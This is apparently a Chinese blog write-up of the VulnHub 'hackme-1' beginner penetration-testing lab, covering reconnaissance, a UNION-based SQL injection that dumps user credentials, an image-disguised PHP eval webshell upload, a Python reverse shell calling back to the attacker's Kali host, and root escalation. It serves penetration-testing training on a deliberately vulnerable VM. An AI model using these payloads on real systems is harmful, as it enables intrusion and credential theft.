hackme-1初级渗透测试

环境搭建

测试机:kali:192.168.10.153
靶机:hackme-1:192.168.10.155

1. 详情

链接	https://www.vulnhub.com/entry/hackme-1,330/
发布日期	2019年7月18日
作者	x4bx54
难度	初学者,简单

2. 描述

‘hackme’ is a beginner difficulty level box. The goal is to gain
limited privilege access via web vulnerabilities and subsequently
privilege escalate as root. The lab was created to mimic real life
environment.

"hackme"是一个初学者难度级别的框。目标是通过 Web 漏洞获得有限的特权访问,然后将特权升级为
root。该靶机的创建是为了模拟现实生活环境。

0x02环境搭建

  1. 下载靶机
    官网链接直接下载

hackme-1下载地址

一:信息收集

0x01主机发现

arp-sacn -l

或者:

netdiscover -i eth0 -r 192.168.10.0/24

在这里插入图片描述

端口扫描

masscan --rate=10000 --ports 0-65535 192.168.10.155

在这里插入图片描述

服务扫描

 nmap -sV -T4 -O -p 22,80 192.168.10.155

在这里插入图片描述

服务器指纹信息查询

whatweb http://192.168.10.155

在这里插入图片描述

网站目录爆破

dirb http://192.168.10.155

在这里插入图片描述
访问靶机网站,搜集可用信息

二:漏洞发现

http://192.168.10.155/login.php 发现一个登录界面,
且有sign up now 点击创建新用户

在这里插入图片描述

创建用户

在这里插入图片描述
创建用户尝试登录
此处我创建
root
password的用户名密码

SQL注入

在这里插入图片描述

0x01 判断注入类型:

Windows os’ and 1=1#

windows os’ and 1=2#
发现为单引号字符型注入

0x02 判断字段数
Windows OS' order by 3#

发现字段数为三
在这里插入图片描述

0x03判断显示位
-1' union select 1,2,3#

在这里插入图片描述

0x04 查询库名
-1' union select database(),2,3#

在这里插入图片描述

0x05 查询表名
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

在这里插入图片描述

0x06查询列名
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

在这里插入图片描述

0x07 查询user password列的数据
-1' union select group_concat(user),group_concat(pasword),3 from users#

在这里插入图片描述

MD5解密

将得到的数据进行MD5解密,得到用户名及密码,此处使用
在这里插入图片描述

superadmin 2386acb2cf356944177746fc92523983
Uncrackable

文件上传漏洞

漏洞验证

尝试登录,发现一文件上传的页面,尝试上传图片马
在这里插入图片描述

GIF89a<?php phpinfo();?> 将此代码写入记事本,并修改后缀为jpg

抓包查看,将文件后缀名改为phpinfo.php
在这里插入图片描述
在这里插入图片描述

查看文件目录,发现文件上传成功
在这里插入图片描述

三:漏洞利用

反弹shell法一: 一句话木马

0x01 制作图片马:

<?php @eval($_POST[shell]); ?>

copy a.jpg/b + tu.php/a b.jpg 将b.jpg上传,
访问上传的木马: http://192.168.30.207/uploads/b.php

0x02 蚁剑直连:
在这里插入图片描述

0x03 上传反弹shell脚本
将反弹shell放在网站根目录下,开启http服务

此为反弹shell脚本

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“192.168.10.153”,443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

在这里插入图片描述
0x04 kali监听443 端口
在这里插入图片描述
反弹shell成功

四:提权

识别所存在的用户

cat /etc/passwd | grep /bin/bash

在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件

./touchmenot

在这里插入图片描述
渗透结束,这个靶机考察了目录搜集,sql注入,文件上传漏洞,反弹shell等内容,靶机难度较为简单。

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值